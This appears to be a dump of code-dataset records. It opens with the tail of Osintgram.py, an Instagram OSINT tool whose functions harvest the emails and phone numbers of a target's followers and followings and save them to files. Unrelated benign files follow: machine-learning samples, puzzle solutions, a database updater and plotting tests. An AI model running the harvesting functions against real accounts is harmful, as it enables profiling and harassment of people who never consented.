We found \" + str(len(ids)) + \" (\" + str(counter) + \") users\\n\", pc.GREEN)\n\n json_data = {}\n tagged_list = []\n\n for i in range(len(ids)):\n t.add_row([post[i], full_name[i], username[i], str(ids[i])])\n\n if self.jsonDump:\n tag = {\n 'post': post[i],\n 'full_name': full_name[i],\n 'username': username[i],\n 'id': ids[i]\n }\n tagged_list.append(tag)\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_tagged.txt\"\n file = open(file_name, \"w\")\n file.write(str(t))\n file.close()\n\n if self.jsonDump:\n json_data['tagged'] = tagged_list\n json_file_name = self.output_dir + \"/\" + self.target + \"_tagged.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n\n print(t)\n else:\n pc.printout(\"Sorry! No results found :-(\\n\", pc.RED)\n\n def get_user(self, username):\n try:\n content = self.api.username_info(username)\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_user_id.txt\"\n file = open(file_name, \"w\")\n file.write(str(content['user']['pk']))\n file.close()\n\n user = dict()\n user['id'] = content['user']['pk']\n user['is_private'] = content['user']['is_private']\n\n return user\n except ClientError as e:\n pc.printout('ClientError {0!s} (Code: {1:d}, Response: {2!s})'.format(e.msg, e.code, e.error_response), pc.RED)\n error = json.loads(e.error_response)\n if 'message' in error:\n print(error['message'])\n if 'error_title' in error:\n print(error['error_title'])\n if 'challenge' in error:\n print(\"Please follow this link to complete the challenge: \" + error['challenge']['url']) \n sys.exit(2)\n \n\n def set_write_file(self, flag):\n if flag:\n pc.printout(\"Write to file: \")\n pc.printout(\"enabled\", pc.GREEN)\n pc.printout(\"\\n\")\n else:\n pc.printout(\"Write to file: \")\n pc.printout(\"disabled\", pc.RED)\n pc.printout(\"\\n\")\n\n self.writeFile = flag\n\n def set_json_dump(self, flag):\n if flag:\n pc.printout(\"Export to JSON: \")\n pc.printout(\"enabled\", pc.GREEN)\n pc.printout(\"\\n\")\n else:\n pc.printout(\"Export to JSON: \")\n pc.printout(\"disabled\", pc.RED)\n pc.printout(\"\\n\")\n\n self.jsonDump = flag\n\n def login(self, u, p):\n try:\n settings_file = \"config/settings.json\"\n if not os.path.isfile(settings_file):\n # settings file does not exist\n print(f'Unable to find file: {settings_file!s}')\n\n # login new\n self.api = AppClient(auto_patch=True, authenticate=True, username=u, password=p,\n on_login=lambda x: self.onlogin_callback(x, settings_file))\n\n else:\n with open(settings_file) as file_data:\n cached_settings = json.load(file_data, object_hook=self.from_json)\n # print('Reusing settings: {0!s}'.format(settings_file))\n\n # reuse auth settings\n self.api = AppClient(\n username=u, password=p,\n settings=cached_settings,\n on_login=lambda x: self.onlogin_callback(x, settings_file))\n\n except (ClientCookieExpiredError, ClientLoginRequiredError) as e:\n print(f'ClientCookieExpiredError/ClientLoginRequiredError: {e!s}')\n\n # Login expired\n # Do relogin but use default ua, keys and such\n self.api = AppClient(auto_patch=True, authenticate=True, username=u, password=p,\n on_login=lambda x: self.onlogin_callback(x, settings_file))\n\n except ClientError as e:\n pc.printout('ClientError {0!s} (Code: {1:d}, Response: {2!s})'.format(e.msg, e.code, e.error_response), pc.RED)\n error = json.loads(e.error_response)\n pc.printout(error['message'], pc.RED)\n pc.printout(\": \", pc.RED)\n pc.printout(e.msg, pc.RED)\n pc.printout(\"\\n\")\n if 'challenge' in error:\n 
print(\"Please follow this link to complete the challenge: \" + error['challenge']['url'])\n exit(9)\n\n def to_json(self, python_object):\n if isinstance(python_object, bytes):\n return {'__class__': 'bytes',\n '__value__': codecs.encode(python_object, 'base64').decode()}\n raise TypeError(repr(python_object) + ' is not JSON serializable')\n\n def from_json(self, json_object):\n if '__class__' in json_object and json_object['__class__'] == 'bytes':\n return codecs.decode(json_object['__value__'].encode(), 'base64')\n return json_object\n\n def onlogin_callback(self, api, new_settings_file):\n cache_settings = api.settings\n with open(new_settings_file, 'w') as outfile:\n json.dump(cache_settings, outfile, default=self.to_json)\n # print('SAVED: {0!s}'.format(new_settings_file))\n\n def check_following(self):\n if str(self.target_id) == self.api.authenticated_user_id:\n return True\n endpoint = 'users/{user_id!s}/full_detail_info/'.format(**{'user_id': self.target_id})\n return self.api._call_api(endpoint)['user_detail']['user']['friendship_status']['following']\n\n def check_private_profile(self):\n if self.is_private and not self.following:\n pc.printout(\"Impossible to execute command: user has private profile\\n\", pc.RED)\n send = input(\"Do you want send a follow request? [Y/N]: \")\n if send.lower() == \"y\":\n self.api.friendships_create(self.target_id)\n print(\"Sent a follow request to target. Use this command after target accepting the request.\")\n\n return True\n return False\n\n def get_fwersemail(self):\n if self.check_private_profile():\n return\n\n followers = []\n \n try:\n\n pc.printout(\"Searching for emails of target followers... this can take a few minutes\\n\")\n\n rank_token = AppClient.generate_uuid()\n data = self.api.user_followers(str(self.target_id), rank_token=rank_token)\n\n for user in data.get('users', []):\n u = {\n 'id': user['pk'],\n 'username': user['username'],\n 'full_name': user['full_name']\n }\n followers.append(u)\n\n next_max_id = data.get('next_max_id')\n while next_max_id:\n sys.stdout.write(\"\\rCatched %i followers email\" % len(followers))\n sys.stdout.flush()\n results = self.api.user_followers(str(self.target_id), rank_token=rank_token, max_id=next_max_id)\n \n for user in results.get('users', []):\n u = {\n 'id': user['pk'],\n 'username': user['username'],\n 'full_name': user['full_name']\n }\n followers.append(u)\n\n next_max_id = results.get('next_max_id')\n \n print(\"\\n\")\n\n results = []\n \n pc.printout(\"Do you want to get all emails? y/n: \", pc.YELLOW)\n value = input()\n \n if value == str(\"y\") or value == str(\"yes\") or value == str(\"Yes\") or value == str(\"YES\"):\n value = len(followers)\n elif value == str(\"\"):\n print(\"\\n\")\n return\n elif value == str(\"n\") or value == str(\"no\") or value == str(\"No\") or value == str(\"NO\"):\n while True:\n try:\n pc.printout(\"How many emails do you want to get? \", pc.YELLOW)\n new_value = int(input())\n value = new_value - 1\n break\n except ValueError:\n pc.printout(\"Error! Please enter a valid integer!\", pc.RED)\n print(\"\\n\")\n return\n else:\n pc.printout(\"Error! 
Please enter y/n :-)\", pc.RED)\n print(\"\\n\")\n return\n\n for follow in followers:\n user = self.api.user_info(str(follow['id']))\n if 'public_email' in user['user'] and user['user']['public_email']:\n follow['email'] = user['user']['public_email']\n if len(results) > value:\n break\n results.append(follow)\n\n except ClientThrottledError as e:\n pc.printout(\"\\nError: Instagram blocked the requests. Please wait a few minutes before you try again.\", pc.RED)\n pc.printout(\"\\n\")\n\n if len(results) > 0:\n\n t = PrettyTable(['ID', 'Username', 'Full Name', 'Email'])\n t.align[\"ID\"] = \"l\"\n t.align[\"Username\"] = \"l\"\n t.align[\"Full Name\"] = \"l\"\n t.align[\"Email\"] = \"l\"\n\n json_data = {}\n\n for node in results:\n t.add_row([str(node['id']), node['username'], node['full_name'], node['email']])\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_fwersemail.txt\"\n file = open(file_name, \"w\")\n file.write(str(t))\n file.close()\n\n if self.jsonDump:\n json_data['followers_email'] = results\n json_file_name = self.output_dir + \"/\" + self.target + \"_fwersemail.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n\n print(t)\n else:\n pc.printout(\"Sorry! No results found :-(\\n\", pc.RED)\n\n def get_fwingsemail(self):\n if self.check_private_profile():\n return\n\n followings = []\n\n try:\n\n pc.printout(\"Searching for emails of users followed by target... this can take a few minutes\\n\")\n\n rank_token = AppClient.generate_uuid()\n data = self.api.user_following(str(self.target_id), rank_token=rank_token)\n\n for user in data.get('users', []):\n u = {\n 'id': user['pk'],\n 'username': user['username'],\n 'full_name': user['full_name']\n }\n followings.append(u)\n\n next_max_id = data.get('next_max_id')\n \n while next_max_id:\n results = self.api.user_following(str(self.target_id), rank_token=rank_token, max_id=next_max_id)\n\n for user in results.get('users', []):\n u = {\n 'id': user['pk'],\n 'username': user['username'],\n 'full_name': user['full_name']\n }\n followings.append(u)\n\n next_max_id = results.get('next_max_id')\n \n results = []\n \n pc.printout(\"Do you want to get all emails? y/n: \", pc.YELLOW)\n value = input()\n \n if value == str(\"y\") or value == str(\"yes\") or value == str(\"Yes\") or value == str(\"YES\"):\n value = len(followings)\n elif value == str(\"\"):\n print(\"\\n\")\n return\n elif value == str(\"n\") or value == str(\"no\") or value == str(\"No\") or value == str(\"NO\"):\n while True:\n try:\n pc.printout(\"How many emails do you want to get? \", pc.YELLOW)\n new_value = int(input())\n value = new_value - 1\n break\n except ValueError:\n pc.printout(\"Error! Please enter a valid integer!\", pc.RED)\n print(\"\\n\")\n return\n else:\n pc.printout(\"Error! Please enter y/n :-)\", pc.RED)\n print(\"\\n\")\n return\n\n for follow in followings:\n sys.stdout.write(\"\\rCatched %i followings email\" % len(results))\n sys.stdout.flush()\n user = self.api.user_info(str(follow['id']))\n if 'public_email' in user['user'] and user['user']['public_email']:\n follow['email'] = user['user']['public_email']\n if len(results) > value:\n break\n results.append(follow)\n \n except ClientThrottledError as e:\n pc.printout(\"\\nError: Instagram blocked the requests. 
Please wait a few minutes before you try again.\", pc.RED)\n pc.printout(\"\\n\")\n \n print(\"\\n\")\n\n if len(results) > 0:\n t = PrettyTable(['ID', 'Username', 'Full Name', 'Email'])\n t.align[\"ID\"] = \"l\"\n t.align[\"Username\"] = \"l\"\n t.align[\"Full Name\"] = \"l\"\n t.align[\"Email\"] = \"l\"\n\n json_data = {}\n\n for node in results:\n t.add_row([str(node['id']), node['username'], node['full_name'], node['email']])\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_fwingsemail.txt\"\n file = open(file_name, \"w\")\n file.write(str(t))\n file.close()\n\n if self.jsonDump:\n json_data['followings_email'] = results\n json_file_name = self.output_dir + \"/\" + self.target + \"_fwingsemail.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n\n print(t)\n else:\n pc.printout(\"Sorry! No results found :-(\\n\", pc.RED)\n\n def get_fwingsnumber(self):\n if self.check_private_profile():\n return\n \n try:\n\n pc.printout(\"Searching for phone numbers of users followed by target... this can take a few minutes\\n\")\n\n followings = []\n\n rank_token = AppClient.generate_uuid()\n data = self.api.user_following(str(self.target_id), rank_token=rank_token)\n\n for user in data.get('users', []):\n u = {\n 'id': user['pk'],\n 'username': user['username'],\n 'full_name': user['full_name']\n }\n followings.append(u)\n\n next_max_id = data.get('next_max_id')\n \n while next_max_id:\n results = self.api.user_following(str(self.target_id), rank_token=rank_token, max_id=next_max_id)\n\n for user in results.get('users', []):\n u = {\n 'id': user['pk'],\n 'username': user['username'],\n 'full_name': user['full_name']\n }\n followings.append(u)\n\n next_max_id = results.get('next_max_id')\n \n results = []\n \n pc.printout(\"Do you want to get all phone numbers? y/n: \", pc.YELLOW)\n value = input()\n \n if value == str(\"y\") or value == str(\"yes\") or value == str(\"Yes\") or value == str(\"YES\"):\n value = len(followings)\n elif value == str(\"\"):\n print(\"\\n\")\n return\n elif value == str(\"n\") or value == str(\"no\") or value == str(\"No\") or value == str(\"NO\"):\n while True:\n try:\n pc.printout(\"How many phone numbers do you want to get? \", pc.YELLOW)\n new_value = int(input())\n value = new_value - 1\n break\n except ValueError:\n pc.printout(\"Error! Please enter a valid integer!\", pc.RED)\n print(\"\\n\")\n return\n else:\n pc.printout(\"Error! Please enter y/n :-)\", pc.RED)\n print(\"\\n\")\n return\n\n for follow in followings:\n sys.stdout.write(\"\\rCatched %i followings phone numbers\" % len(results))\n sys.stdout.flush()\n user = self.api.user_info(str(follow['id']))\n if 'contact_phone_number' in user['user'] and user['user']['contact_phone_number']:\n follow['contact_phone_number'] = user['user']['contact_phone_number']\n if len(results) > value:\n break\n results.append(follow)\n\n except ClientThrottledError as e:\n pc.printout(\"\\nError: Instagram blocked the requests. 
Please wait a few minutes before you try again.\", pc.RED)\n pc.printout(\"\\n\")\n \n print(\"\\n\")\n\n if len(results) > 0:\n t = PrettyTable(['ID', 'Username', 'Full Name', 'Phone'])\n t.align[\"ID\"] = \"l\"\n t.align[\"Username\"] = \"l\"\n t.align[\"Full Name\"] = \"l\"\n t.align[\"Phone\"] = \"l\"\n\n json_data = {}\n\n for node in results:\n t.add_row([str(node['id']), node['username'], node['full_name'], node['contact_phone_number']])\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_fwingsnumber.txt\"\n file = open(file_name, \"w\")\n file.write(str(t))\n file.close()\n\n if self.jsonDump:\n json_data['followings_phone_numbers'] = results\n json_file_name = self.output_dir + \"/\" + self.target + \"_fwingsnumber.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n\n print(t)\n else:\n pc.printout(\"Sorry! No results found :-(\\n\", pc.RED)\n\n def get_fwersnumber(self):\n if self.check_private_profile():\n return\n\n followers = []\n\n try:\n\n pc.printout(\"Searching for phone numbers of target followers... this can take a few minutes\\n\")\n\n\n rank_token = AppClient.generate_uuid()\n data = self.api.user_followers(str(self.target_id), rank_token=rank_token) # followers endpoint (the old code queried followings by mistake)\n\n for user in data.get('users', []):\n u = {\n 'id': user['pk'],\n 'username': user['username'],\n 'full_name': user['full_name']\n }\n followers.append(u)\n\n next_max_id = data.get('next_max_id')\n \n while next_max_id:\n results = self.api.user_followers(str(self.target_id), rank_token=rank_token, max_id=next_max_id)\n\n for user in results.get('users', []):\n u = {\n 'id': user['pk'],\n 'username': user['username'],\n 'full_name': user['full_name']\n }\n followers.append(u)\n\n next_max_id = results.get('next_max_id')\n \n results = []\n \n pc.printout(\"Do you want to get all phone numbers? y/n: \", pc.YELLOW)\n value = input()\n \n if value == str(\"y\") or value == str(\"yes\") or value == str(\"Yes\") or value == str(\"YES\"):\n value = len(followers)\n elif value == str(\"\"):\n print(\"\\n\")\n return\n elif value == str(\"n\") or value == str(\"no\") or value == str(\"No\") or value == str(\"NO\"):\n while True:\n try:\n pc.printout(\"How many phone numbers do you want to get? \", pc.YELLOW)\n new_value = int(input())\n value = new_value - 1\n break\n except ValueError:\n pc.printout(\"Error! Please enter a valid integer!\", pc.RED)\n print(\"\\n\")\n return\n else:\n pc.printout(\"Error! Please enter y/n :-)\", pc.RED)\n print(\"\\n\")\n return\n\n for follow in followers:\n sys.stdout.write(\"\\rCatched %i followers phone numbers\" % len(results))\n sys.stdout.flush()\n user = self.api.user_info(str(follow['id']))\n if 'contact_phone_number' in user['user'] and user['user']['contact_phone_number']:\n follow['contact_phone_number'] = user['user']['contact_phone_number']\n if len(results) > value:\n break\n results.append(follow)\n\n except ClientThrottledError as e:\n pc.printout(\"\\nError: Instagram blocked the requests. 
Please wait a few minutes before you try again.\", pc.RED)\n pc.printout(\"\\n\")\n\n print(\"\\n\")\n\n if len(results) > 0:\n t = PrettyTable(['ID', 'Username', 'Full Name', 'Phone'])\n t.align[\"ID\"] = \"l\"\n t.align[\"Username\"] = \"l\"\n t.align[\"Full Name\"] = \"l\"\n t.align[\"Phone\"] = \"l\"\n\n json_data = {}\n\n for node in results:\n t.add_row([str(node['id']), node['username'], node['full_name'], node['contact_phone_number']])\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_fwersnumber.txt\"\n file = open(file_name, \"w\")\n file.write(str(t))\n file.close()\n\n if self.jsonDump:\n json_data['followers_phone_numbers'] = results\n json_file_name = self.output_dir + \"/\" + self.target + \"_fwersnumber.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n\n print(t)\n else:\n pc.printout(\"Sorry! No results found :-(\\n\", pc.RED)\n\n def get_comments(self):\n if self.check_private_profile():\n return\n\n pc.printout(\"Searching for users who commented...\\n\")\n\n data = self.__get_feed__()\n users = []\n\n for post in data:\n comments = self.__get_comments__(post['id'])\n for comment in comments:\n print(comment['text'])\n \n # if not any(u['id'] == comment['user']['pk'] for u in users):\n # user = {\n # 'id': comment['user']['pk'],\n # 'username': comment['user']['username'],\n # 'full_name': comment['user']['full_name'],\n # 'counter': 1\n # }\n # users.append(user)\n # else:\n # for user in users:\n # if user['id'] == comment['user']['pk']:\n # user['counter'] += 1\n # break\n\n if len(users) > 0:\n ssort = sorted(users, key=lambda value: value['counter'], reverse=True)\n\n json_data = {}\n\n t = PrettyTable()\n\n t.field_names = ['Comments', 'ID', 'Username', 'Full Name']\n t.align[\"Comments\"] = \"l\"\n t.align[\"ID\"] = \"l\"\n t.align[\"Username\"] = \"l\"\n t.align[\"Full Name\"] = \"l\"\n\n for u in ssort:\n t.add_row([str(u['counter']), u['id'], u['username'], u['full_name']])\n\n print(t)\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_users_who_commented.txt\"\n file = open(file_name, \"w\")\n file.write(str(t))\n file.close()\n\n if self.jsonDump:\n json_data['users_who_commented'] = ssort\n json_file_name = self.output_dir + \"/\" + self.target + \"_users_who_commented.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n else:\n pc.printout(\"Sorry! 
No results found :-(\\n\", pc.RED)\n\n def clear_cache(self):\n try:\n # a context manager closes the handle and avoids the NameError the old finally block raised when open() itself failed\n with open(\"config/settings.json\", 'w') as f:\n f.write(\"{}\")\n pc.printout(\"Cache cleared.\\n\", pc.GREEN)\n except FileNotFoundError:\n pc.printout(\"config/settings.json doesn't exist.\\n\", pc.RED)\n","repo_name":"Datalux/Osintgram","sub_path":"src/Osintgram.py","file_name":"Osintgram.py","file_ext":"py","file_size_in_byte":60313,"program_lang":"python","lang":"en","doc_type":"code","stars":7814,"dataset":"github-code","pt":"21"} +{"seq_id":"28201177600","text":"import sys\nsys.path.append('../../') # this adds the parent directory to the import path\nimport beeBrain.neuralNetworks as nn\nimport numpy as np\n\nnp.random.seed(1)\nf = np.load('./datasets/cnn_dataset01.npz')\ntrain_x, train_y = f['x_train'][:, :, :, None], f['y_train'][:, None]\ntest_x, test_y = f['x_test'][:2000][:, :, :, None], f['y_test'][:2000]\n\ntrain_loader = nn.DataLoader(train_x, train_y, batch_size=64)\n\nclass CNN(nn.Module):\n def __init__(self):\n super().__init__()\n self.seq_layers = self.sequential(\n nn.layers.Conv2D(1, 6, (5, 5), (1, 1), \"same\", channels_last=True), # => [n,28,28,6]\n nn.layers.MaxPool2D(2, 2), # => [n, 14, 14, 6]\n nn.layers.Conv2D(6, 16, 5, 1, \"same\", channels_last=True), # => [n,14,14,16]\n nn.layers.MaxPool2D(2, 2), # => [n,7,7,16]\n nn.layers.Flatten(), # => [n,7*7*16]\n nn.layers.Dense(7 * 7 * 16, 10, )\n )\n\n def forward(self, x):\n o = self.seq_layers.forward(x)\n return o\n\n\ncnn = CNN()\nopt = nn.optim.Adam(cnn.params, 0.001)\nloss_fn = nn.losses.SparseSoftMaxCrossEntropyWithLogits()\n\n\nfor step in range(300):\n bx, by = train_loader.next_batch()\n by_ = cnn.forward(bx)\n loss = loss_fn(by_, by)\n cnn.backward(loss)\n opt.step()\n if step % 50 == 0:\n ty_ = cnn.forward(test_x)\n acc = nn.metrics.accuracy(np.argmax(ty_.data, axis=1), test_y)\n print(\"Step: %i | loss: %.3f | acc: %.2f\" % (step, loss.data, acc))\n\n","repo_name":"devhima/beeBrain","sub_path":"samples/nn_samples/cnn_sample.py","file_name":"cnn_sample.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"5778472696","text":"from collections import defaultdict\nfrom math import prod\n\nIN_FILE_PATH = \"advent_of_code/2023/day3/3.txt\"\nIN_FILE_EX3 = \"advent_of_code/2023/day3/ex_3.txt\"\n\n\ndef parse_schematic(infile: str) -> list[list]:\n \"\"\"Parse schematic from file\n\n Args:\n infile: Input file path\n\n Returns:\n 2D matrix holding the engine schematic\n \"\"\"\n\n with open(infile, \"r\") as file:\n return [[c for c in line.strip()] for line in file]\n\n\ndef day_3a(infile):\n sch = parse_schematic(infile)\n m = len(sch) # of rows\n n = len(sch[0]) # of cols\n\n def special_search(i, j):\n # Searches for special characters surrounding the given location\n\n for k in range(i - 1, i + 2):\n for l in range(j - 1, j + 2):\n if not (k == i and l == j) and 0 <= k < m and 0 <= l < n:\n cur = sch[k][l]\n if not cur.isnumeric() and cur != \".\":\n return True\n return False\n\n ans = 0\n for i, row in enumerate(sch):\n nums = []\n part_num = False\n for j, col in enumerate(sch[i]):\n cur = sch[i][j]\n if cur.isnumeric():\n nums.append(sch[i][j])\n if not part_num:\n part_num = special_search(i, j)\n else:\n if part_num:\n ans += int(\"\".join(nums))\n nums.clear()\n part_num = False\n if part_num and nums:\n ans += int(\"\".join(nums))\n\n return ans\n\n\ndef day_3b(infile):\n sch = parse_schematic(infile)\n m = len(sch) # of rows\n n = 
len(sch[0]) # of cols\n stars = defaultdict(list)\n\n def star_search(i, j):\n # Searches for \"*\" chars surrounding given location and returns their location\n\n for k in range(i - 1, i + 2):\n for l in range(j - 1, j + 2):\n if not (k == i and l == j) and 0 <= k < m and 0 <= l < n:\n cur = sch[k][l]\n if cur == \"*\":\n return k, l\n return None\n\n ans = 0\n for i, row in enumerate(sch):\n nums = []\n gear_loc = None\n for j, col in enumerate(sch[i]):\n cur = sch[i][j]\n if cur.isnumeric():\n nums.append(sch[i][j])\n if not gear_loc:\n gear_loc = star_search(i, j)\n else:\n if gear_loc:\n stars[gear_loc].append(int(\"\".join(nums)))\n nums.clear()\n gear_loc = None\n if gear_loc and nums:\n stars[gear_loc].append(int(\"\".join(nums)))\n\n return sum(prod(starset) for starset in stars.values() if len(starset) == 2)\n\n\nprint(day_3a(IN_FILE_EX3))\nprint(day_3a(IN_FILE_PATH))\nprint(day_3b(IN_FILE_EX3))\nprint(day_3b(IN_FILE_PATH))\n\nassert day_3a(IN_FILE_EX3) == 4361\nassert day_3a(IN_FILE_PATH) == 535351\nassert day_3b(IN_FILE_EX3) == 467835\nassert day_3b(IN_FILE_PATH) == 87287096\n","repo_name":"jowls/challenges","sub_path":"advent_of_code/2023/day3/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15134618367","text":"# coding: utf-8\nif '__file__' in globals():\n import os, sys\n sys.path.append(os.path.join(os.path.dirname(__file__), '..'))\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom dezero import Variable\nfrom dezero import optimizers\nimport dezero.functions as F\nfrom dezero.models import MLP\n\n# Same as step45.py\n\n# Dataset\nnp.random.seed(0)\nx = np.random.rand(100, 1)\ny = np.sin(2 * np.pi * x) + np.random.rand(100, 1)\n\n# Hyperparameter settings\nlr = 0.2\nmax_iter = 10000\nhidden_size = 10\n\nmodel = MLP((hidden_size, 1))\noptimizer = optimizers.MomentumSGD(lr)\noptimizer.setup(model)\n\n# Alternatively, the two lines above can be combined into the following single line\n# optimizer = optimizers.SGD(lr).setup(model)\n\n\n# Start training\nfor i in range(max_iter):\n y_pred = model(x)\n loss = F.mean_squared_error(y, y_pred)\n\n model.cleargrads()\n loss.backward()\n\n optimizer.update()\n if i % 1000 == 0:\n print(loss)","repo_name":"miyamotononno/dl_from_scratch","sub_path":"DLfromS3/steps/step46.py","file_name":"step46.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21517237681","text":"\"\"\"\nParent program for the API_DB_Mediator.\nUse from command line to initialize specific tables (or all) (py db_updater.py -t [table_name]) \nDouble click or run with no args for GUI interface.\n\nAuthor: Nikolas Kovacs\n\"\"\"\nfrom api_db_mediator import API_DB_Mediator\nimport argparse\nimport threading\n\ndef update(tables_to_update, table_args, ui=None):\n def update_table(method_args, event_to_set):\n if len(method_args) == 1: # method takes no args\n method_args[0]()\n else:\n method_args[0](method_args[1])\n event_to_set.set()\n\n def update_ui(ui, table_to_update, stop, end_thread_event):\n # time_estimates = get_estimate_times_for_updates()\n still_updating = True\n progress_bar = 0\n while still_updating and not stop():\n if progress_bar < 100:\n ui.progressChanged.emit(progress_bar + 1) # temporary solution until we have estimated times\n progress_bar += 1\n time.sleep(0.2)\n else:\n still_updating = False\n ui.update_label(f\"Updating {table_to_update}... 
Do not close this window.\")\n end_thread_event.set()\n \n\n\n for table_to_update in tables_to_update:\n ui_stop_thread_event = threading.Event()\n ui_thread_ended_event = threading.Event()\n ui_stop_thread = False\n\n if ui:\n ui_updater_thread = threading.Thread(target=update_ui, args=(ui, table_to_update, lambda: ui_stop_thread, ui_thread_ended_event), daemon=True, name=\"ui_updater_thread\")\n ui_updater_thread.start()\n\n update_table(table_args[table_to_update], ui_stop_thread_event)\n \n ui_stop_thread_event.wait()\n ui_stop_thread = True\n ui_thread_ended_event.wait()\n \n if ui:\n ui.progressChanged.emit(100)\n time.sleep(0.5)\n ui.update_label(\"Done updating. You may close this window.\")\n\n\ndef get_estimate_times_for_updates():\n pass\n\ndef init_args(db):\n return {\n \"initalize_all\": [db.initialize_db],\n \"states\": [db._API_DB_Mediator__init_states_table],\n \"counties\": [db._API_DB_Mediator__init_counties_table],\n \"county_unemployment\": [db._API_DB_Mediator__init_county_unemployment_table],\n \"state_unemployment\": [db._API_DB_Mediator__init_state_unemployment_table],\n \"county_workers\": [db._API_DB_Mediator__init_county_workers_table],\n \"county_employment\": [db._API_DB_Mediator__init_employment_table, \"COUNTY\"],\n \"state_employment\": [db._API_DB_Mediator__init_employment_table, \"STATE\"],\n \"us_employment\": [db._API_DB_Mediator__init_employment_table, \"US\"],\n \"county_data\": [db._API_DB_Mediator__init_census_county_data_table],\n \"state_data\": [db._API_DB_Mediator__init_census_state_data_table],\n \"county_poverty\": [db._API_DB_Mediator__init_census_county_poverty_table],\n \"state_poverty\": [db._API_DB_Mediator__init_census_state_poverty_table],\n \"school_districts\": [db._API_DB_Mediator__init_census_school_districts_table],\n \"zipcodes\": [db._API_DB_Mediator__init_zipcodes_table],\n \"county_gdp\": [db._API_DB_Mediator__init_gdp_table, \"COUNTY\"],\n \"state_gdp\": [db._API_DB_Mediator__init_gdp_table, \"STATE\"],\n }\n\nif __name__ == \"__main__\":\n db = API_DB_Mediator()\n table_args = init_args(db)\n\n parser = argparse.ArgumentParser(description=\"CLI for updating tables in the Demographic Database\\n\"\\\n \"Run with no arguments to open GUI\"\\\n \"Run with single table argument to update that table\"\\\n \"./db_updater.exe -h for help\")\n parser.add_argument(\"-t\", \"--table\", type=str, choices=table_args.keys(), help=\"Enter a table to update\")\n args = parser.parse_args()\n table_to_update = args.table\n\n # if table argument provided, update that table\n # otherwise, open gui and let user select table(s) to update\n if table_to_update:\n update([table_to_update], table_args)\n else:\n import sys\n import time\n from db_updater_gui import GUI\n from PyQt5 import QtWidgets\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = GUI(MainWindow)\n MainWindow.show()\n\n def try_to_get_tables_and_update():\n tables_to_update = None\n while not tables_to_update:\n tables_to_update = ui.get_tables_to_update()\n time.sleep(0.5)\n update(tables_to_update, table_args, ui)\n\n thread = threading.Thread(target=try_to_get_tables_and_update, daemon=True)\n thread.start()\n\n sys.exit(app.exec_())\n","repo_name":"nikovacs/Demographic-API-and-Database-Controller","sub_path":"db_updater.py","file_name":"db_updater.py","file_ext":"py","file_size_in_byte":4663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71004919414","text":"import scene\nfrom 
euclid import *\nfrom math import *\nfrom scene import LightSet, Triangle, Sphere, Texture, MergedTexture\nfrom draw import Image\n\nclass Scene(scene.Scene):\n def __init__(self):\n super(Scene, self).__init__()\n lights = self.make_example_light()\n lights.add_diffuse(Vector3(0, 1, 0),\n Vector3(0, 0, 1))\n\n def tex_color(x):\n X = 0.3\n if (x.x % (X*2)) < X != (x.y % (X*2)) < X:\n return Vector3(0, 0, 1)\n else:\n return Vector3(1, 1, 1)\n\n img = Image.load('linux.jpg')\n tex_img = Texture(img, Vector2(2, -2))\n\n d = 50\n S = 13\n self.objects += self.make_tetrahedron(\n lights,\n Vector3(-2, -3, d),\n Vector3(2, -3, d),\n Vector3(0, -3, d - S*2),\n Vector3(0, 2, d - S),\n texture=tex_img,\n )\n\n self.objects += [\n Sphere(lights, Vector3(0.5, 0, 29), 0.3)\n ]\n\n def make_tetrahedron(self, light, a, b, c, d, **kwargs):\n return [\n Triangle(light, a, b, c, **kwargs),\n Triangle(light, a, b, d, **kwargs),\n Triangle(light, a, c, d, **kwargs),\n Triangle(light, b, c, d, **kwargs),\n ]\n","repo_name":"zielmicha/raytracing-demo","sub_path":"textures.py","file_name":"textures.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18271927707","text":"\"\"\"Test drawing module\n\"\"\"\nimport pytest\n\nimport numpy as np\n\nfrom shellplot.axis import Axis\nfrom shellplot.drawing import (\n LegendItem,\n _draw_canvas,\n _draw_legend,\n _draw_title,\n _draw_x_axis,\n _draw_y_axis,\n _pad_lines,\n)\n\n\ndef test_draw_legend():\n legend = [LegendItem(1, \"one\"), LegendItem(2, \"two\")]\n legend_lines = [\" + one\", \" * two\"]\n assert legend_lines == _draw_legend(legend)\n\n\ndef test_draw_title():\n title_str = _draw_title(title=\"My\", x_display_max=39, left_pad=0)\n expected_title_str = \" \" * 20 + \"My\"\n assert title_str == expected_title_str\n\n\n@pytest.mark.parametrize(\n \"lines,ref_lines,expecte_padded_lines\",\n [\n ([\"a\", \"b\"], [\"a\", \"b\", \"c\"], [\"\", \"a\", \"b\"]),\n (None, [\"a\", \"b\", \"c\"], [\"\", \"\", \"\"]),\n ],\n)\ndef test_pad_lines(lines, ref_lines, expecte_padded_lines):\n padded_lines = _pad_lines(lines, ref_lines)\n assert padded_lines == expecte_padded_lines\n\n\n@pytest.mark.parametrize(\n 